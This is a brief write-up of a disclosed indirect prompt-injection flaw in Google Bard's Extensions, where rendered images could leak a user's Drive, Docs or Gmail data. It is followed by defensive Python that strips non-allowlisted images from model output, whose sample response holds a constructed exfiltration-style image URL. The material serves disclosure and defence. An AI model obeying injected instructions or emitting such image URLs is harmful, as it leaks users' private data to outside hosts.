Google Bard recently received powerful updates, one of which is Extensions. Extensions allow Bard to access services such as YouTube, flight and hotel searches, and even a user’s personal documents and emails, including Drive, Docs, and Gmail. However, this newfound access also exposes Bard to Indirect Prompt Injection. Prompt Injection has been tested successfully with older YouTube videos and Google Docs, revealing the potential for interesting exploits. Notably, a vulnerability in Google Bard allows the rendering of images, which can be exploited to exfiltrate data. The issue was demonstrated and responsibly disclosed to Google, which subsequently fixed it.
https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/
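
A rendered image makes the client request its URL as soon as the response is displayed, so one mitigation for the image-rendering risk described above is to filter model output before it reaches the renderer. The following is an added example, not code from the original post or from Google: it keeps inline Markdown images only when they are https and on an allowlist, and removes raw `<img>` tags. The host names, function names and sample response are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this chat UI may load images from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Inline Markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*<?([^)\s>]+)>?(?:\s+"[^"]*")?\s*\)')
# Raw HTML image tag, in case the renderer passes HTML through.
HTML_IMAGE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def host_allowed(url):
    """True only for https URLs whose host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS


def sanitize_model_output(text):
    """Return (safe_text, blocked) for one model response."""
    blocked = []  # what was removed, for logging and alerting

    def check_markdown(match):
        url = match.group(1)
        if host_allowed(url):
            return match.group(0)  # allowlisted image is left untouched
        blocked.append(url)
        return "[image removed]"

    def drop_html(match):
        blocked.append(match.group(0))
        return "[image removed]"

    text = MD_IMAGE.sub(check_markdown, text)
    text = HTML_IMAGE.sub(drop_html, text)
    return text, blocked


# Constructed sample response, not taken from the original post.
SAMPLE = (
    "Here is the summary you asked for. "
    "![logo](https://images.example.com/logo.png) "
    "![status](https://collector.example.net/p.png?d=Q09OVEVYVA)"
)
```

Reference-style Markdown images are not covered by this filter; a Content Security Policy `img-src` restriction in the rendering client enforces the same allowlist regardless of syntax.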